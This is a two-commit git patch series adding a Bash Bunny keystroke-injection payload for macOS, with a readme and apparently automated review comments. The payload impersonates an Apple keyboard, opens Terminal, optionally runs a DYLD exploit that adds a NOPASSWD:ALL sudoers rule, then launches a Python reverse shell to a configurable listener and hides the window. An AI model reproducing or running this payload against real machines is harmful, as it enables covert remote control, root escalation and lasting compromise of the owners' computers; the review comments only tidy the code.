From 00684c885724a5cb1a3eb0d5419c3483d1926738 Mon Sep 17 00:00:00 2001
From: Chris
Date: Mon, 13 Mar 2017 21:45:07 -0400
Subject: [PATCH 1/2] MRS initial add of reverse shell for mac
---
 payloads/library/MacReverseShell/payload.txt | 53 ++++++++++++++++++++
 payloads/library/MacReverseShell/readme.md | 21 ++++++++
 2 files changed, 74 insertions(+)
 create mode 100755 payloads/library/MacReverseShell/payload.txt
 create mode 100755 payloads/library/MacReverseShell/readme.md
diff --git a/payloads/library/MacReverseShell/payload.txt b/payloads/library/MacReverseShell/payload.txt
new file mode 100755
index 0000000..9b4bf03
--- /dev/null
+++ b/payloads/library/MacReverseShell/payload.txt
@@ -0,0 +1,53 @@
+LED B
+#Set your Variables, bro
+DYLD_ROOT=true
+LHOST=192.168.17.12
+LPORT=4444
+
+#daddy want a MacBook keyboard, or momma mac be mad, go boom boom.
+VID 05ac
+PID 2227
+LANGUAGE='us'
+
+
+# Gimme a Keyboard please. Thanks.
+ATTACKMODE HID
+LED R G B
+
+# Get a terminal
+QUACK DELAY 400
+QUACK GUI SPACE
+QUACK DELAY 300
+QUACK STRING terminal
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 400
+
+# optional DYLD exploit script
+if $DYLD_ROOT; then
+ LED R
+ QUACK SPACE
+ QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s
+ QUACK ENTER
+ QUACK DELAY 200
+ QUACK ENTER
+ QUACK ENTER
+ QUACK ENTER
+ QUACK ENTER
+ QUACK DELAY 200
+fi
+
+# python reverse shell
+QUACK SPACE
+QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\)
+QUACK ENTER
+QUACK DELAY 200
+QUACK SPACE
+QUACK STRING clear
+QUACK ENTER
+QUACK GUI q
+QUACK DELAY 100
+QUACK ENTER
+
+# Green is the official Light of "finished"
+LED G
\ No newline at end of file
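Review bot: `if $DYLD_ROOT; then` executes the variable's value as a command on the Bunny itself, so the switch is only a boolean while the value is literally `true` or `false`; any other setting (`no`, `0`, a typo) is reported as "command not found" and silently takes the false path, or runs whatever string was assigned. Test the value instead: `if [ "$DYLD_ROOT" = true ]; then`. The `QUACK STRING echo ...` line inside that branch writes a `NOPASSWD:ALL` rule for the current user into `/etc/sudoers` on the target and nothing later in the payload removes it, so the readme's "root shell" wording understates it; document that the optional branch leaves a persistent sudoers modification behind. The four bare `QUACK ENTER` lines that follow also need a one-line comment saying which prompt each keystroke is there to dismiss, otherwise the count looks arbitrary to the next editor.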
diff --git a/payloads/library/MacReverseShell/readme.md b/payloads/library/MacReverseShell/readme.md
new file mode 100755
index 0000000..085589c
--- /dev/null
+++ b/payloads/library/MacReverseShell/readme.md
@@ -0,0 +1,21 @@
+# Mac Reverse Shell
+
+Author: mrt0mat0
+Version: Version 1.0
+
+## Description
+
+Using ducky script, it opens a python reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell.
+
+## Configuration
+
+This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs
+
+## STATUS
+
+| LED | Status |
+| ---------------- | ------------------------------------- |
+| Blue | Setup |
+| White | Running the scripts |
+| Red | r00t exploit is running (optional |
+| Green | Finished |
\ No newline at end of file
From 70af321846c083318169d25997b817cd8292b24a Mon Sep 17 00:00:00 2001
From: Chris
Date: Mon, 13 Mar 2017 21:50:31 -0400
Subject: [PATCH 2/2] MRS initial add of reverse shell for mac
---
 payloads/library/MacReverseShell/payload.txt | 6 +-----
 1 file changed, 1 insertion(+), 5 deletions(-)
diff --git a/payloads/library/MacReverseShell/payload.txt b/payloads/library/MacReverseShell/payload.txt
index 9b4bf03..1085348 100755
--- a/payloads/library/MacReverseShell/payload.txt
+++ b/payloads/library/MacReverseShell/payload.txt
@@ -4,14 +4,10 @@ DYLD_ROOT=true
 LHOST=192.168.17.12
 LPORT=4444
 
-#daddy want a MacBook keyboard, or momma mac be mad, go boom boom.
-VID 05ac
-PID 2227
 LANGUAGE='us'
-
 
 # Gimme a Keyboard please. Thanks.
-ATTACKMODE HID
+ATTACKMODE HID VID_0X05AC PID_0X021E
 LED R G B
 
 # Get a terminal
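Review bot: The new `ATTACKMODE HID VID_0X05AC PID_0X021E` line changes the product id from the `2227` introduced in patch 1/2 to `0x021E` with no explanation, and the readme added in that same patch still refers to "the VID and PID variables ... at the top", which this hunk deletes. Either update readme.md in this series or keep a comment where the removed one stood, e.g. `# Enumerate as an Apple keyboard (VID 0x05AC, PID 0x021E)`, so the values are not bare magic numbers. Both commits also carry the identical subject "MRS initial add of reverse shell for mac"; the second should say what it actually changed (the HID identifiers) so the history is readable.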